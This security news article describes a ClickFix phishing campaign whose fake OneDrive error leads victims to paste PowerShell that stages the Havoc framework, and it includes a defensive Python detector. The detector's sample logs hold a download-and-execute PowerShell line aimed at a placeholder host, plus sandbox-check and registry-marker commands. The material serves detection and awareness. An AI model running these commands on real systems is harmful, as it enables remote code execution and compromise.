A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands that could install the Havoc post-exploitation framework. This tactic could provide hackers with remote access to compromised machines.
ClickFix is a social engineering technique that initially appeared last year. In it, threat actors create webpages or phishing files that display fake issues and then push the user to click a button to resolve them.
Clicking the button copies a malicious PowerShell command to the Windows clipboard, and the page then instructs the user to paste it into a command prompt to “fix” the issue. Instead of fixing anything, the PowerShell command runs a script from a remote site that downloads and installs malware on the device.
The ClickFix phishing campaign exploits Microsoft’s cloud services.
In a new ClickFix phishing campaign, the threat actors send phishing emails claiming that a “restricted notice” is ready for inspection and that recipients should open the attached HTML document to access it.
Once opened, the HTML displays a fake 0x8004de86 error claiming that a connection to the “One Drive” cloud service failed and that the user must manually update the DNS cache to resolve it.
Once the user clicks the “How to fix” button, a PowerShell command is immediately copied to the Windows clipboard and instructions for executing it are displayed. This PowerShell command attempts to run a second PowerShell script hosted on the threat actor’s SharePoint server.
The researchers also noted that the script determines whether the device is in a sandbox environment by checking the number of devices in the Windows domain; if it concludes that it is running in a sandbox, it terminates.
Otherwise, the script writes a value to the Windows Registry indicating that it has executed on the device. It then checks whether Python is already installed and, if not, installs it.
Finally, a Python script is downloaded from the same SharePoint site and run to load the Havoc post-exploitation command-and-control framework as an injected DLL.
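The stages described above give a defender a set of behaviours to look for in PowerShell script block logs. The following Python is an added example, not code from the article or from any vendor: the log entries are constructed to mimic the shape of those stages (the URLs, registry path and package name are placeholders), and a block is flagged only when two or more indicators co-occur, so that a lone SharePoint download by an administrator is not flagged on its own.

```python
import re

# Constructed sample entries in the shape of PowerShell script block logging
# (Event ID 4104) text. None are real captures; URLs, paths and package names
# are placeholders chosen to exercise the rules below.
SAMPLE_EVENTS = [
    {"id": 1, "text": "iex (iwr 'https://tenant-placeholder.sharepoint.com/s/x/stage1.ps1').Content"},
    {"id": 2, "text": "if ((Get-ADComputer -Filter *).Count -lt 5) { exit }; "
                      "New-ItemProperty -Path HKCU:\\Software\\Marker -Name ran -Value 1; "
                      "winget install Python.Python.3"},
    {"id": 3, "text": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
    {"id": 4, "text": "Invoke-WebRequest 'https://tenant-placeholder.sharepoint.com/sites/it/deploy.ps1' -OutFile deploy.ps1"},
]

# One rule per behaviour the campaign write-up describes: the staged download
# from SharePoint, inline execution of that download, the domain computer
# count used as a sandbox check, the registry "already ran" marker, and the
# Python installation that precedes the final stage.
RULES = {
    "remote_script_from_sharepoint": re.compile(r"(iwr|Invoke-WebRequest|curl|Invoke-RestMethod)\b.*?sharepoint\.com", re.I),
    "inline_execution_of_download": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "domain_computer_count_check": re.compile(r"Get-ADComputer\b.*?\.Count", re.I),
    "registry_marker_write": re.compile(r"(New-ItemProperty|Set-ItemProperty|reg\s+add)\b", re.I),
    "python_install": re.compile(r"winget\s+install\s+Python|python-[\d.]+-amd64\.exe", re.I),
}


def score_event(text):
    """Return the names of the rules that fire on one script block, in rule order."""
    return [name for name, rx in RULES.items() if rx.search(text)]


def triage(events, threshold=2):
    """Return {event_id: [indicators]} for every event that fires at least
    `threshold` distinct rules. A single indicator is deliberately not enough:
    an admin pulling a deployment script from SharePoint (event 4) matches one
    rule and stays out of the result, while the lure stages (events 1 and 2)
    combine several behaviours in a single block."""
    flagged = {}
    for ev in events:
        names = score_event(ev["text"])
        if len(names) >= threshold:
            flagged[ev["id"]] = names
    return flagged


if __name__ == "__main__":
    for event_id, names in triage(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(names)}")
```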
Havoc, an open-source post-exploitation framework similar to Cobalt Strike, enables attackers to manipulate infected devices remotely.
Threat actors frequently employ post-exploitation frameworks such as Havoc to penetrate corporate networks and then move laterally to additional devices on the network. Users should therefore never open a link from any messaging platform without first verifying it, which avoids or at least limits the impact of phishing attacks like this one.
